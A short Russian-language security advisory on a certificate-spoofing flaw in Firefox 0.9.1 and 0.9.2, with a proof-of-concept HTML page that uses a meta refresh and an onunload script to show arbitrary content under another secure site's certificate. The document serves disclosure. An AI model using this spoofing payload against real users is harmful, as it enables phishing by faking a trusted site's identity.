Программа: Firefox 0.9.1, 0.9.2
Уязвимость подделки сертификатов обнаружена в Mozilla Firefox. Удаленный Web сервер может подделать сертификат другого сайта.
Удаленный пользователь может создать специально обработанный HTML, который отобразит Web страницу с сертификатом другого произвольного безопасного Web сайта.
Пример:
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln(' < body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>
